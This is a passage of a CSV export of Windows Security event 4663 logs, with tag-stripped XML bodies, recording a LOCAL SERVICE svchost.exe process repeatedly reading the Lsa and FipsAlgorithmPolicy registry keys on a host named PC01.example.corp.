SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452906 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452905 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452904 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452903 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452902 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452901 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452900 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452899 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452898 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452897 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452896 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452895 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452894 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452893 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452892 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452891 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452890 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452889 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452888 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452887 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452886 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452885 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452884 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452883 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452882 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452881 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452880 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452879 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452878 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452877 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452876 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452875 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452874 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452873 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452872 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452871 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452870 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452869 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452868 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452867 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452866 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452865 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452864 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452863 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452862 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452861 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452860 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452859 + + + + + Security + PC01.example.corp + + + 